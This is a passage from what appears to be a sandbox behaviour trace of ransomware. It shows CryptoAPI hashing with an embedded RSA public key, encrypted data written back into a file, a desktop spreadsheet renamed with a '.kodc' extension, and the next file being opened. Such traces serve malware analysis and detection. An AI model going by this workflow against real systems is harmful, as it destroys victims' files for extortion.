KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.812] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.812] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.812] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.812] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.812] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.813] GetLastError () returned 0x0 [0097.813] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.813] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.813] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.813] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.813] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15370) returned 0x9ba4d90 [0097.813] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340068 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6d0 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33400b0 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6e8 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a718 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a730 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.814] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a718 | out: hHeap=0x630000) returned 1 [0097.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a730 | out: hHeap=0x630000) returned 1 [0097.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a730 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a718 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a730 | out: hHeap=0x630000) returned 1 [0097.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a718 | out: hHeap=0x630000) returned 1 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.815] GetCurrentThreadId () returned 0x42c [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6962a8 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.815] GetCurrentThreadId () returned 0x42c [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a718 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a730 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a700 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a748 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a718 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a718 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a718 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a748 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a730 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a700 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a6e8 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33400b0 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.819] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x1536b, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x1536b, lpOverlapped=0x0) returned 1 [0097.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.819] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.819] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0097.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0097.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0097.819] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.819] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.820] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.820] CloseHandle (hObject=0x5cc) returned 1 [0097.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.822] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ojxdX-of4_PQAXSnC.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ojxdx-of4_pqaxsnc.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ojxdX-of4_PQAXSnC.ods.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ojxdx-of4_pqaxsnc.ods.kodc")) returned 1 [0097.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.822] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0097.823] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x867a05c0, ftCreationTime.dwHighDateTime=0x1d5becb, ftLastAccessTime.dwLowDateTime=0x9f8dc60, ftLastAccessTime.dwHighDateTime=0x1d5bdcc, ftLastWriteTime.dwLowDateTime=0x9f8dc60, ftLastWriteTime.dwHighDateTime=0x1d5bdcc, nFileSizeHigh=0x0, nFileSizeLow=0x95f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pFReHiaBWQMkp8i.bmp", cAlternateFileName="PFREHI~1.BMP")) returned 1 [0097.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0097.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.824] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pFReHiaBWQMkp8i.bmp") returned=".bmp" [0097.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pFReHiaBWQMkp8i.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pfrehiabwqmkp8i.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.824] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=38389) returned 1 [0097.824] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.827] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x95cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.827] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.828] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.828] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x95f5, lpOverlapped=0x0) returned 1 [0097.828] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.828] 